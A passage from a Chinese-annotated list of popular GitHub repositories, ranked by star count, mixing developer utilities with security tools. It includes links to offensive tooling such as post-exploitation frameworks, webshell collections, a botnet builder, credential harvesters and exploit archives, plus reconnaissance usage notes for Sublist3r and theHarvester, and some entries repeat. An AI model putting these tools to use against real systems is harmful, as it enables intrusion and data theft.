- [**5380**星][10d] [Py] [bregman-arie/devops-exercises](https://github.com/bregman-arie/devops-exercises) Linux, Jenkins, AWS, SRE, Prometheus, Docker, Python, Ansible, Git, Kubernetes, Terraform, OpenStack, SQL, NoSQL, Azure, GCP, DNS, Elastic, Network, Virtualization
- [**5378**星][7d] [Java] [meituan-dianping/walle](https://github.com/meituan-dianping/walle) Android Signature V2 Scheme签名下的新一代渠道包打包神器
- [**5377**星][7d] [PS] [empireproject/empire](https://github.com/EmpireProject/Empire) 后渗透框架. Windows客户端用PowerShell, Linux/OSX用Python. 之前PowerShell Empire和Python EmPyre的组合
- [**5376**星][10d] [JS] [bda-research/node-crawler](https://github.com/bda-research/node-crawler) Web Crawler/Spider for NodeJS + server-side jQuery ;-)
- [**5374**星][10d] [Py] [manisso/fsociety](https://github.com/manisso/fsociety) 渗透测试框架
- [**5366**星][10d] [Makefile] [frida/frida](https://github.com/frida/frida) 面向开发人员、逆向工程师和安全研究人员的动态插桩工具包
- [**5346**星][2y] [Py] [xiyoumc/webhubbot](https://github.com/xiyoumc/webhubbot) 学习Scrapy Spider框架和MongoDB数据库,
- [**5321**星][10d] [Py] [sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) 透明的代理服务器,作为穷人的VPN。用 ssh转发。不需要管理。适用于Linux和MacOS。支持DNS隧道
- [**5299**星][4m] [PHP] [tennc/webshell](https://github.com/tennc/webshell) webshell收集
- [**5273**星][10d] [Py] [evilsocket/opensnitch](https://github.com/evilsocket/opensnitch) Little Snitch 应用程序防火墙的 GNU/Linux 版本。(Little Snitch:Mac操作系统的应用程序防火墙,能防止应用程序在你不知道的情况下自动访问网络)
- [**5266**星][10d] [Shell] [stackexchange/blackbox](https://github.com/stackexchange/blackbox) 文件使用PGP加密后隐藏在Git/Mercurial/Subversion
- [**5265**星][4m] [Py] [n1nj4sec/pupy](https://github.com/n1nj4sec/pupy) Python编写的远控、后渗透工具,跨平台(Windows, Linux, OSX, Android)
- [**5263**星][4m] [ObjC] [macpass/macpass](https://github.com/MacPass/MacPass) A native OS X KeePass client
- [**5249**星][10d] [C] [offensive-security/exploitdb](https://github.com/offensive-security/exploitdb) 官方Exploit Database存储库
- [**5236**星][7d] [Py] [injetlee/python](https://github.com/injetlee/python) Python脚本。模拟登录知乎, 爬虫,操作excel,微信公众号,远程开机
- [**5229**星][10d] [Go] [cloudflare/cfssl](https://github.com/cloudflare/cfssl) Cloudflare的PKI和TLS工具包
- [**5227**星][4m] [Py] [usarmyresearchlab/dshell](https://github.com/usarmyresearchlab/dshell) 可扩展的网络取证分析框架。支持快速开发插件,以支持剖析网络数据包捕获。
- [**5224**星][11d] [Rust] [sharkdp/hexyl](https://github.com/sharkdp/hexyl) 命令行中查看hex
- [**5224**星][1y] [JS] [samyk/poisontap](https://github.com/samyk/poisontap) 使用USB攻击上锁的/密码保护的电脑,释放基于WebSocket的后门,暴露内部路由器,使用树莓派和Node.js窃取Cookies
- [**5209**星][3m] [C++] [avast/retdec](https://github.com/avast/retdec) 基于 LLVM 的可重定位机器码反编译器, 可检测壳、检测和重构C++类继承、重构函数/类型/结构体等、可反编译为 C 或 Python 2种高级语言格式
- [**5209**星][10d] [Go] [gcla/termshark](https://github.com/gcla/termshark) tshark的终端UI,灵感来自Wireshark
- [**5201**星][10d] [Py] [secdev/scapy](https://github.com/secdev/scapy) 交互式数据包操作, Python, 命令行+库
- [**5142**星][7m] [Lua] [alexazhou/verynginx](https://github.com/alexazhou/verynginx) 一个非常强大和友好的基于lua-nginx模块(openresty)的nginx,它提供WAF、控制面板和仪表板。
- [**5140**星][8d] [Py] [snare/voltron](https://github.com/snare/voltron) 用于黑客的hacky调试器UI
- [**5136**星][10d] [Shell] [nginx-proxy/docker-letsencrypt-nginx-proxy-companion](https://github.com/nginx-proxy/docker-letsencrypt-nginx-proxy-companion) LetsEncrypt companion container for nginx-proxy
- [**5094**星][4m] [Py] [trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) 来自TrustedSec的社会工程师工具包(SET)存储库
- [**4999**星][10d] [Py] [twintproject/twint](https://github.com/twintproject/twint) 不使用Twitter的API,绕过API限制,抓取用户的关注者,关注者,推文等
- [**4998**星][10d] [TS] [apis-guru/graphql-voyager](https://github.com/apis-guru/graphql-voyager) 将任何GraphQL API表示为交互式图形。
- [**4992**星][11d] [Go] [yinghuocho/firefly-proxy](https://github.com/yinghuocho/firefly-proxy) 帮助绕过GFW的代理软件。
- [**4987**星][10d] [JS] [beefproject/beef](https://github.com/beefproject/beef) 浏览器漏洞开发框架项目
- [**4982**星][7d] [C++] [thealgorithms/c-plus-plus](https://github.com/thealgorithms/c-plus-plus) All Algorithms implemented in C++
- [**4979**星][5m] [Py] [alessandroz/lazagne](https://github.com/alessandroz/lazagne) 检索大量存储在本地计算机上的密码
- [**4967**星][3m] [C] [google/oss-fuzz](https://github.com/google/oss-fuzz) 对开源软件进行持续性fuzzing
- [**4957**星][10d] [C] [lz4/lz4](https://github.com/lz4/lz4) 极快压缩算法
- [**4952**星][10d] [C++] [facebook/redex](https://github.com/facebook/redex) Android App字节码优化器
- [**4949**星][11d] [Go] [bitly/oauth2_proxy](https://github.com/bitly/oauth2_proxy) 反向代理,静态文件服务器,提供Providers(Google/Github)认证
- [**4948**星][7d] [C++] [paddlepaddle/paddle-lite](https://github.com/PaddlePaddle/Paddle-Lite) Multi-platform high performance deep learning inference engine (『飞桨』多平台高性能深度学习预测引擎)
- [**4945**星][11d] [Py] [worldveil/dejavu](https://github.com/worldveil/dejavu) 用Python实现的音频指纹识别算法
- [**4940**星][10d] [JS] [wuchangming/spy-debugger](https://github.com/wuchangming/spy-debugger) 微信调试,各种WebView样式调试、手机浏览器的页面真机调试。便捷的远程调试手机页面、抓包工具,支持:HTTP/HTTPS,无需USB连接设备。
- [**4931**星][4m] [C++] [hrydgard/ppsspp](https://github.com/hrydgard/ppsspp) 一个适用于Android、Windows、Mac和Linux的PSP模拟器,用c++编写
- [**4928**星][10d] [Py] [jopohl/urh](https://github.com/jopohl/urh) 通用无线电黑客:像boss一样研究无线协议
- [**4906**星][8d] [Ruby] [wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) 免费的,非商业用途,黑盒WordPress漏洞扫描器写的安全专业人士和博客维护者,以测试他们的WordPress网站的安全性。
- [**4906**星][10d] [C++] [mozilla/rr](https://github.com/mozilla/rr) 记录与重放App的调试执行过程
- [**4893**星][10d] [C] [openvpn/openvpn](https://github.com/openvpn/openvpn) 开源VPN守护进程
- [**4891**星][3m] [Py] [openmined/pysyft](https://github.com/openmined/pysyft) 一个用于加密的、保护隐私的机器学习的库
- [**4890**星][11d] [Go] [ponzu-cms/ponzu](https://github.com/ponzu-cms/ponzu) Headless CMS with automatic JSON API. Featuring auto-HTTPS from Let's Encrypt, HTTP/2 Server Push, and flexible server framework written in Go.
- [**4868**星][1y] [Py] [10se1ucgo/disablewintracking](https://github.com/10se1ucgo/disablewintracking) 使用一些已知的方法,试图在Windows 10中最小化跟踪
- [**4850**星][10d] [qazbnm456/awesome-web-security](https://github.com/qazbnm456/awesome-web-security) web 安全资源列表
- [**4817**星][10d] [Py] [jofpin/trape](https://github.com/jofpin/trape) 学习在互联网上跟踪别人,获取其详细信息,并避免被别人跟踪
- [**4806**星][10d] [Shell] [zardus/ctf-tools](https://github.com/zardus/ctf-tools) Some setup scripts for security research tools.
- [**4793**星][7d] [Swift] [signalapp/signal-ios](https://github.com/signalapp/Signal-iOS) A private messenger for iOS.
- [**4781**星][7d] [Ruby] [vcr/vcr](https://github.com/vcr/vcr) 记录您的测试套件的HTTP交互,并在未来的测试运行期间重播它们,以便进行快速、确定、准确的测试。
- [**4760**星][10d] [Java] [spring-projects/spring-security](https://github.com/spring-projects/spring-security) Spring Security
- [**4753**星][10d] [Shell] [dehydrated-io/dehydrated](https://github.com/dehydrated-io/dehydrated) 以shell脚本实现的letsencrypt/acme客户端
- [**4748**星][4m] [PHP] [phan/phan](https://github.com/phan/phan) Phan is a static analyzer for PHP. Phan prefers to avoid false-positives and attempts to prove incorrectness rather than correctness.
- [**4730**星][5m] [powershell/win32-openssh](https://github.com/powershell/win32-openssh) Win32版本的OpenSSH
- [**4722**星][6m] [C] [google/ios-webkit-debug-proxy](https://github.com/google/ios-webkit-debug-proxy) 一个用于iOS设备的DevTools代理(Chrome远程调试协议)(Safari远程Web Inspector)。
- [**4716**星][10d] [Py] [dxa4481/trufflehog](https://github.com/dxa4481/trufflehog) 在git存储库中搜索高熵字符串和秘密,深入挖掘提交历史
- [**4711**星][10d] [Py] [secureauthcorp/impacket](https://github.com/SecureAuthCorp/impacket) Python类收集, 用于与网络协议交互
- [**4701**星][10d] [Rust] [timvisee/ffsend](https://github.com/timvisee/ffsend) 轻松、安全地从命令行共享文件
- [**4687**星][11d] [Go] [davecheney/httpstat](https://github.com/davecheney/httpstat) It's like curl -v, with colours.
- [**4669**星][4m] [Shell] [dehydrated-io/dehydrated](https://github.com/dehydrated-io/dehydrated) letsencrypt/acme client implemented as a shell-script – just add water
- [**4660**星][11d] [JS] [bfirsh/jsnes](https://github.com/bfirsh/jsnes) 一个JavaScript NES模拟器。
- [**4659**星][10d] [Jupyter Notebook] [aimacode/aima-python](https://github.com/aimacode/aima-python) ython实现的算法来自Russell和Norvig的“人工智能——一种现代方法”
- [**4655**星][11d] [C] [jedisct1/dsvpn](https://github.com/jedisct1/dsvpn) 一个非常简单的VPN。
- [**4653**星][1y] [Py] [ecthros/uncaptcha2](https://github.com/ecthros/uncaptcha2) 以91%的准确率击败最新版本的ReCaptcha
- [**4607**星][4m] [JS] [cure53/dompurify](https://github.com/cure53/dompurify) 一个仅用于dom、超高速、超强容纳性的XSS杀毒器,适用于HTML、MathML和SVG
- [**4598**星][10d] [Shell] [ashishb/android-security-awesome](https://github.com/ashishb/android-security-awesome) A collection of android security related resources
- [**4590**星][10d] [Go] [gophish/gophish](https://github.com/gophish/gophish) 网络钓鱼工具包
- [**4588**星][11d] [Go] [wallix/awless](https://github.com/wallix/awless) 对于AWS来说,这是一个强大的CLI
- [**4544**星][11d] [jivoi/awesome-osint](https://github.com/jivoi/awesome-osint) OSINT资源收集
- [**4535**星][2y] [Py] [lining0806/pythonspidernotes](https://github.com/lining0806/pythonspidernotes) Python入门网络爬虫之精华版
- [**4534**星][11d] [Py] [tensorflow/cleverhans](https://github.com/tensorflow/cleverhans) Python库,基准测试(benchmark)机器学习系统的漏洞生成(to)对抗样本(adversarial examples)
- [**4527**星][7d] [Py] [chyroc/wechatsogou](https://github.com/chyroc/wechatsogou) 基于搜狗微信搜索的微信公众号爬虫接口
- [**4524**星][10d] [Go] [shopify/toxiproxy](https://github.com/shopify/toxiproxy) 用于模拟网络条件的框架,用测试来证明您的应用程序没有单点故障吗
- [**4519**星][10d] [JS] [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) A curated list of CTF frameworks, libraries, resources and softwares
- [**4519**星][10d] [JS] [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) A curated list of CTF frameworks, libraries, resources and softwares
- [**4517**星][11d] [Go] [michenriksen/gitrob](https://github.com/michenriksen/gitrob) 查找push到公开的Github repo中的敏感信息
- [**4489**星][10d] [Go] [dexidp/dex](https://github.com/dexidp/dex) 带有可插入连接器的OpenID连接标识(OIDC)和OAuth 2.0提供程序
- [**4454**星][11d] [Java] [mcxiaoke/packer-ng-plugin](https://github.com/mcxiaoke/packer-ng-plugin) 下一代Android打包工具,100个渠道包只需要10秒钟
- [**4444**星][10d] [Py] [smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) 自动收集指定目标的信息:IP、域名、主机名、网络子网、ASN、邮件地址、用户名
- [**4442**星][10d] [PHP] [fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) 通过动态App安全测试来查找App安全漏洞, 算是不带扫描器的漏洞扫描器
- [**4436**星][2y] [JS] [yujiosaka/headless-chrome-crawler](https://github.com/yujiosaka/headless-chrome-crawler) 分布式爬虫,Headless Chrome
- [**4398**星][3m] [C#] [xupefei/locale-emulator](https://github.com/xupefei/locale-emulator) 另一个系统重新登陆和语言模拟器
- [**4395**星][10d] [Py] [spiderclub/haipproxy](https://github.com/spiderclub/haipproxy)
- [**4393**星][11d] [TS] [javascript-obfuscator/javascript-obfuscator](https://github.com/javascript-obfuscator/javascript-obfuscator) 一个强大的JavaScript和Node.js模糊器
- [**4377**星][10d] [JS] [travist/jsencrypt](https://github.com/travist/jsencrypt) 用于执行OpenSSL RSA加密、解密和密钥生成的Javascript库
- [**4376**星][10d] [C++] [anbox/anbox](https://github.com/anbox/anbox) 在常规GNU / Linux系统上引导完整的Android系统,基于容器
- [**4372**星][10d] [LLVM] [llvm-mirror/llvm](https://github.com/llvm-mirror/llvm) Project moved to:
- [**4370**星][1y] [Py] [lennylxx/ipv6-hosts](https://github.com/lennylxx/ipv6-hosts) hosts文件,用于提高IPv6访问速度的谷歌,YouTube, Facebook,维基百科等在中国大陆。
- [**4361**星][5m] [Py] [aboul3la/sublist3r](https://github.com/aboul3la/sublist3r) 快速子域名枚举
<details>
<summary>查看详情</summary>
## 存在问题
- 代理集成
- 翻墙
- 结果的保存与查看, 是不是该有啥可视化工具???
## 使用OSINT的方式搜索子域名
- 使用多个搜索引擎: Google, Yahoo, Bing, Baidu, Ask
- 使用: Netcraft, Virustotal, ThreatCrowd, DNSdumpster, ReverseDNS.
- 集成: subbrute(爆破)
## 安装
- `git clone https://github.com/aboul3la/Sublist3r.git`
- `sudo pip install -r requirements.txt`
## 使用
Short Form | Long Form | Description
------------- | ------------- |-------------
-d | --domain | Domain name to enumerate subdomains of
-b | --bruteforce | Enable the subbrute bruteforce module
-p | --ports | Scan the found subdomains against specific tcp ports
-v | --verbose | Enable the verbose mode and display results in realtime
-t | --threads | Number of threads to use for subbrute bruteforce
-e | --engines | Specify a comma-separated list of search engines
-o | --output | Save the results to text file
-h | --help | show the help message and exit
## 作为模块使用
```python
import sublist3r
subdomains = sublist3r.main(domain, no_threads, savefile, ports, silent, verbose, enable_bruteforce, engines)
```
</details>
- [**4358**星][10d] [Java] [jesusfreke/smali](https://github.com/jesusfreke/smali) dalvik使用的dex格式的汇编器/反汇编器
- [**4355**星][2m] [Py] [diafygi/acme-tiny](https://github.com/diafygi/acme-tiny) 一个用于从Let's Encrypt中发出和更新TLS证书的小脚本
- [**4355**星][10d] [Assembly] [cjdelisle/cjdns](https://github.com/cjdelisle/cjdns) 使用公钥加密技术进行地址分配的加密IPv6网络和用于路由的分布式哈希表。
- [**4353**星][10d] [wtsxdev/reverse-engineering](https://github.com/wtsxdev/reverse-engineering) List of awesome reverse engineering resources
- [**4350**星][3m] [C] [nonstriater/learn-algorithms](https://github.com/nonstriater/learn-algorithms) 算法学习笔记
- [**4349**星][2y] [Py] [rmax/scrapy-redis](https://github.com/rmax/scrapy-redis) 用于Scrapy的基于redis的组件。
- [**4340**星][1y] [ObjC] [alonemonkey/monkeydev](https://github.com/alonemonkey/monkeydev) CaptainHook微调,徽标微调和命令行工具,补丁iOS应用程序,没有越狱
- [**4339**星][11d] [imeiji/shadowsocks_install](https://github.com/imeiji/shadowsocks_install) 自动安装shadowsocks服务器
- [**4330**星][10d] [Pascal] [cheat-engine/cheat-engine](https://github.com/cheat-engine/cheat-engine) Cheat Engine. A development environment focused on modding
- [**4327**星][10d] [JS] [butterproject/butter-desktop](https://github.com/butterproject/butter-desktop) All the free parts of Popcorn Time
- [**4326**星][7d] [Py] [spiderclub/weibospider](https://github.com/spiderclub/weibospider)
- [**4326**星][7d] [Py] [spiderclub/weibospider](https://github.com/SpiderClub/weibospider) 微博爬虫
- [**4309**星][4m] [we5ter/scanners-box](https://github.com/we5ter/scanners-box) 安全行业从业者自研开源扫描器合辑
- [**4297**星][10d] [Py] [hypothesisworks/hypothesis](https://github.com/HypothesisWorks/hypothesis) Hypothesis is a powerful, flexible, and easy to use library for property-based testing.
- [**4297**星][10d] [Py] [hypothesisworks/hypothesis](https://github.com/HypothesisWorks/hypothesis) Hypothesis is a powerful, flexible, and easy to use library for property-based testing.
- [**4261**星][10d] [Go] [mozilla/sops](https://github.com/mozilla/sops) 简单灵活的秘密管理工具
- [**4257**星][11d] [JS] [cuckoosandbox/cuckoo](https://github.com/cuckoosandbox/cuckoo) Cuckoo Sandbox is an automated dynamic malware analysis system
- [**4257**星][11d] [JS] [cuckoosandbox/cuckoo](https://github.com/cuckoosandbox/cuckoo) 一个自动动态恶意软件分析系统
- [**4255**星][10d] [C] [tencent/tencentos-tiny](https://github.com/tencent/tencentos-tiny) 腾讯物联网终端操作系统
- [**4252**星][4m] [Shell] [angristan/openvpn-install](https://github.com/angristan/openvpn-install) 在Debian、Ubuntu、Fedora、CentOS或Arch Linux上设置自己的OpenVPN服务器。
- [**4243**星][7d] [PS] [bloodhoundad/bloodhound](https://github.com/BloodHoundAD/BloodHound) 一个单页Javascript web应用程序,使用图论来揭示Active Directory环境中隐藏的且常常是意外的关系
- [**4235**星][10d] [JS] [lesspass/lesspass](https://github.com/lesspass/lesspass) 无状态密码管理器。
- [**4234**星][10d] [Py] [euske/pdfminer](https://github.com/euske/pdfminer) Python PDF解析器
- [**4232**星][7m] [JS] [sigalor/whatsapp-web-reveng](https://github.com/sigalor/whatsapp-web-reveng) WhatsApp Web API逆向与重新实现
- [**4226**星][11d] [forter/security-101-for-saas-startups](https://github.com/forter/security-101-for-saas-startups) 初学者安全小窍门
- [**4214**星][11d] [JS] [kdzwinel/betwixt](https://github.com/kdzwinel/betwixt) 在浏览器外,使用熟悉的Chrome DevTools界面分析网络流量
- [**4211**星][10d] [Py] [angr/angr](https://github.com/angr/angr) 一个强大的用户友好的二进制分析平台
- [**4208**星][4m] [drduh/yubikey-guide](https://github.com/drduh/yubikey-guide) 在GPG和SSH中使用YubiKey的指南
- [**4207**星][10d] [Py] [google/clusterfuzz](https://github.com/google/clusterfuzz) 可扩展的Fuzzing基础架构
- [**4197**星][10d] [C] [aol/moloch](https://github.com/aol/moloch) 数据包捕获、索引工具,支持数据库
- [**4194**星][7d] [C] [secwiki/windows-kernel-exploits](https://github.com/secwiki/windows-kernel-exploits) windows-kernel-exploits Windows平台提权漏洞集合
- [**4186**星][7d] [PHP] [ethicalhack3r/dvwa](https://github.com/ethicalhack3r/DVWA) Damn Vulnerable Web Application (DVWA)
- [**4166**星][10d] [Py] [xoreaxeaxeax/sandsifter](https://github.com/xoreaxeaxeax/sandsifter) x86 处理器 Fuzzer,查找 Intel 的隐藏指令和 CPU bug
- [**4166**星][10d] [Py] [paralax/awesome-honeypots](https://github.com/paralax/awesome-honeypots) an awesome list of honeypot resources
- [**4139**星][10d] [hakluke/how-to-exit-vim](https://github.com/hakluke/how-to-exit-vim) Below are some simple methods for exiting vim.
- [**4136**星][3m] [C#] [microsoft/msbuild](https://github.com/microsoft/msbuild) The Microsoft Build Engine (MSBuild) is the build platform for .NET and Visual Studio.
- [**4135**星][2m] [C] [aquynh/capstone](https://github.com/aquynh/capstone) 汇编/反汇编框架
- [**4127**星][10d] [Go] [montferret/ferret](https://github.com/montferret/ferret) Declarative web scraping
- [**4119**星][10d] [PHP] [paragonie/awesome-appsec](https://github.com/paragonie/awesome-appsec) A curated list of resources for learning about application security
- [**4114**星][10d] [C#] [0xd4d/de4dot](https://github.com/0xd4d/de4dot) .NET 反混淆和脱壳
- [**4107**星][10d] [Rust] [svenstaro/genact](https://github.com/svenstaro/genact) a nonsense activity generator
- [**4100**星][10d] [Shell] [drwetter/testssl.sh](https://github.com/drwetter/testssl.sh) 检查服务器任意端口对 TLS/SSL 的支持、协议以及一些加密缺陷,命令行工具
- [**4100**星][12d] [brucedone/awesome-crawler](https://github.com/brucedone/awesome-crawler) A collection of awesome web crawler,spider in different languages
- [**4087**星][10d] [Py] [reorx/httpstat](https://github.com/reorx/httpstat) curl statistics made simple
- [**4071**星][7m] [Swift] [lexrus/vpnon](https://github.com/lexrus/vpnon) 像英雄一样打开VPN。
- [**4054**星][10d] [Py] [longld/peda](https://github.com/longld/peda) GDB漏洞开发助手,Python编写
- [**4046**星][3y] [C#] [shadowsocksr-backup/shadowsocksr-csharp](https://github.com/shadowsocksr-backup/shadowsocksr-csharp) shadowsocksr C#
- [**4040**星][7d] [C#] [winsw/winsw](https://github.com/winsw/winsw) 一种可执行文件的包装器,可用于以Windows服务的形式托管任何可执行文件
- [**4035**星][4m] [C++] [baldurk/renderdoc](https://github.com/baldurk/renderdoc) 基于帧捕获的图形调试器,当前可用于Vulkan,D3D11,D3D12,OpenGL和OpenGL ES开发
- [**4025**星][9m] [Py] [nullarray/autosploit](https://github.com/nullarray/autosploit) 自动化漏洞利用
- [**4025**星][3m] [Go] [eranyanay/1m-go-websockets](https://github.com/eranyanay/1m-go-websockets) handling 1M websockets connections in Go
- [**4019**星][7d] [C] [wind4/vlmcsd](https://github.com/wind4/vlmcsd) C语言的KMS模拟器(目前在Linux上运行,包括Android、FreeBSD、Solaris、Minix、Mac OS、iOS、Windows有或没有Cygwin)
- [**4002**星][10d] [C] [nmap/nmap](https://github.com/nmap/nmap) Nmap
- [**3994**星][10d] [Py] [malwaredllc/byob](https://github.com/malwaredllc/byob) BYOB (Build Your Own Botnet)
- [**3977**星][3m] [acl4ssr/acl4ssr](https://github.com/acl4ssr/acl4ssr) SSR 去广告ACL规则/SS完整GFWList规则/Clash规则碎片,Telegram频道订阅地址
- [**3974**星][3m] [C++] [xenia-project/xenia](https://github.com/xenia-project/xenia) Xbox 360仿真器研究项目
- [**3970**星][5y] [shadowsocksr-backup/shadowsocks-rss](https://github.com/shadowsocksr-backup/shadowsocks-rss) ShadowsocksR update rss, SSR organization
- [**3954**星][6m] [jjqqkk/chromium](https://github.com/jjqqkk/chromium) Chromium browser with SSL VPN. Use this browser to unblock websites.
- [**3953**星][10d] [Java] [ffay/lanproxy](https://github.com/ffay/lanproxy) 将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面...)
- [**3953**星][4m] [C] [atmosphere-nx/atmosphere](https://github.com/atmosphere-nx/atmosphere) 一个工作在进行中的任天堂交换机定制固件。
- [**3948**星][10d] [JS] [shadowsocks/shadowsocks-manager](https://github.com/shadowsocks/shadowsocks-manager) A shadowsocks manager tool for multi user and traffic control.
- [**3938**星][10d] [D] [gnunn1/tilix](https://github.com/gnunn1/tilix) 一个使用GTK+ 3的Linux平铺终端仿真器
- [**3935**星][10d] [Go] [jpillora/chisel](https://github.com/jpillora/chisel) 基于HTTP的快速 TCP 隧道
- [**3931**星][3m] [blacckhathaceekr/pentesting-bible](https://github.com/blacckhathaceekr/pentesting-bible) links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources.
- [**3927**星][4m] [Shell] [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
- [**3909**星][10d] [Go] [adguardteam/adguardhome](https://github.com/adguardteam/adguardhome) Network-wide ads & trackers blocking DNS server
- [**3901**星][10d] [PS] [samratashok/nishang](https://github.com/samratashok/nishang) 渗透框架,脚本和Payload收集,主要是PowerShell,涵盖渗透的各个阶段
- [**3893**星][7d] [C] [cyan4973/xxhash](https://github.com/cyan4973/xxhash) 非常快的非加密哈希算法
- [**3884**星][10d] [Py] [micahflee/onionshare](https://github.com/micahflee/onionshare) 安全和匿名发送和接收文件,并发布洋葱网站
- [**3878**星][10d] [C] [facebook/fishhook](https://github.com/facebook/fishhook) 支持在iOS上运行的Mach-O二进制文件中动态重新绑定符号的库
- [**3871**星][4m] [ObjC] [sveinbjornt/sloth](https://github.com/sveinbjornt/sloth) Mac应用程序,显示所有正在运行的进程使用的所有打开的文件、目录和套接字。很好的lsof GUI。
- [**3860**星][5y] [iosre/iosappreverseengineering](https://github.com/iosre/iosappreverseengineering) The world’s 1st book of very detailed iOS App reverse engineering skills :)
- [**3846**星][2m] [Go] [hashicorp/consul-template](https://github.com/hashicorp/consul-template) Template rendering, notifier, and supervisor for
- [**3832**星][3m] [Go] [go-acme/lego](https://github.com/go-acme/lego) 用Go编写 Let's Encrypt客户机和ACME库
- [**3831**星][3m] [C++] [pcsx2/pcsx2](https://github.com/pcsx2/pcsx2) PCSX2 - The Playstation 2 Emulator
- [**3820**星][10d] [Py] [maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) Web path scanner
- [**3816**星][10d] [Perl] [sullo/nikto](https://github.com/sullo/nikto) Nikto web服务器扫描器
- [**3816**星][10d] [C] [meetecho/janus-gateway](https://github.com/meetecho/janus-gateway) Janus WebRTC服务器
- [**3812**星][10d] [C] [mikebrady/shairport-sync](https://github.com/mikebrady/shairport-sync) AirPlay audio player. Shairport Sync adds multi-room capability with Audio Synchronisation
- [**3807**星][11d] [JS] [samyk/evercookie](https://github.com/samyk/evercookie) JavaScript API,在浏览器中创建超级顽固的cookie,在标准Cookie、Flask Cookie等被清除之后依然能够识别客户端
- [**3801**星][7m] [Go] [microsoft/ethr](https://github.com/microsoft/ethr) 一个用于TCP、UDP和HTTP的网络性能测量工具。
- [**3800**星][3m] [C] [freerdp/freerdp](https://github.com/freerdp/freerdp) 一个免费的远程桌面协议库和客户端
- [**3794**星][10d] [C] [iaik/meltdown](https://github.com/iaik/meltdown) 几个应用程序,演示了Meltdown错误。
- [**3769**星][10d] [Py] [misterch0c/shadowbroker](https://github.com/misterch0c/shadowbroker) 方程式最新泄露
- [**3754**星][10d] [shadowsocksrr/shadowsocks-rss](https://github.com/shadowsocksrr/shadowsocks-rss) ShadowsocksR update rss, SSR organization
- [**3742**星][10d] [Py] [laramies/theharvester](https://github.com/laramies/theharvester) 使用多个公共数据收集电子邮件,名称,子域,IP和URL
<details>
<summary>查看详情</summary>
## 被动源:
- baidu: Baidu search engine - www.baidu.com
- bing: Microsoft search engine - www.bing.com
- bingapi: Microsoft search engine, through the API (Requires an API key, see below.)
- CertSpotter: Cert Spotter monitors Certificate Transparency logs - https://sslmate.com/certspotter/
- crtsh: Comodo Certificate search - www.crt.sh
- dnsdumpster: DNSdumpster search engine - dnsdumpster.com
- dogpile: Dogpile search engine - www.dogpile.com
- duckduckgo: DuckDuckGo search engine - www.duckduckgo.com
- Exalead: a Meta search engine - https://www.exalead.com/search
- github-code: Github code search engine (Requires a Github Personal Access Token, see below.) - www.github.com
- google: Google search engine (Optional Google dorking.) - www.google.com
- hunter: Hunter search engine (Requires an API key, see below.) - www.hunter.io
- intelx: Intelx search engine (Requires an API key, see below.) - www.intelx.io
- linkedin: Google search engine, specific search for LinkedIn users - www.linkedin.com
- netcraft: Internet Security and Data Mining - www.netcraft.com
- otx: AlienVault Open Threat Exchange - https://otx.alienvault.com
- securityTrails: Security Trails search engine, the world's largest repository of historical DNS data (Requires an API key, see below.) - www.securitytrails.com
- shodan: Shodan search engine, will search for ports and banners from discovered hosts - www.shodanhq.com
- Spyse: Web research tools for professionals (Requires an API key.) - https://spyse.com/
- Suip: Web research tools that can take over 10 minutes to run, but worth the wait. - https://suip.biz/
- threatcrowd: Open source threat intelligence - www.threatcrowd.org
- trello: Search trello boards (Uses Google search.)
- twitter: Twitter accounts related to a specific domain (Uses Google search.)
- vhost: Bing virtual hosts search
- virustotal: virustotal.com domain search
- yahoo: Yahoo search engine
## 主动源:
- DNS爆破: 字典
## 需要API-key的
- bing
- github
- hunter
- intelx
- securityTrails
- shodan
- spyse
</details>
- [**3724**星][10d] [Go] [elazarl/goproxy](https://github.com/elazarl/goproxy) Go编写的HTTP代理库
- [**3709**星][10d] [Py] [jrohy/multi-v2ray](https://github.com/jrohy/multi-v2ray) v2ray多用户管理部署程序
- [**3708**星][8d] [PHP] [hanc00l/wooyun_public](https://github.com/hanc00l/wooyun_public) 乌云公开漏洞、知识库爬虫和搜索
- [**3707**星][10d] [HTML] [consensys/smart-contract-best-practices](https://github.com/consensys/smart-contract-best-practices) A guide to smart contract security best practices
- [**3693**星][12d] [jivoi/awesome-ml-for-cybersecurity](https://github.com/jivoi/awesome-ml-for-cybersecurity) 针对网络安全的机器学习资源列表
- [**3690**星][10d] [HTML] [hamukazu/lets-get-arrested](https://github.com/hamukazu/lets-get-arrested) 对抗日本警察
- [**3689**星][10d] [C] [shellphish/how2heap](https://github.com/shellphish/how2heap) 学习各种堆利用技巧的repo
- [**3682**星][10d] [C] [awslabs/s2n](https://github.com/awslabs/s2n) TLS/SSL协议的实现
- [**3680**星][11d] [C++] [mandliya/algorithms_and_data_structures](https://github.com/mandliya/algorithms_and_data_structures) 180+ Algorithm & Data Structure Problems using C++
- [**3680**星][2y] [Py] [qiyeboy/ipproxypool](https://github.com/qiyeboy/ipproxypool) IPProxyPool代理池项目,提供代理ip
- [**3672**星][8d] [Go] [tophubs/toplist](https://github.com/tophubs/toplist) 今日热榜,一个获取各大热门网站热门头条的聚合网站,使用Go语言编写,多协程异步快速抓取信息,预览:
- [**3667**星][4m] [JS] [koenkk/zigbee2mqtt](https://github.com/koenkk/zigbee2mqtt) Zigbee
- [**3664**星][3m] [Smarty] [anankke/sspanel-uim](https://github.com/anankke/sspanel-uim) 专为 Shadowsocks / ShadowsocksR / V2Ray 设计的多用户管理面板
- [**3659**星][3m] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) 大规模漏洞利用工具
- [**3653**星][11d] [Shell] [toyodadoubi/doubi](https://github.com/toyodadoubi/doubi) 一个逗比写的各种逗比脚本~
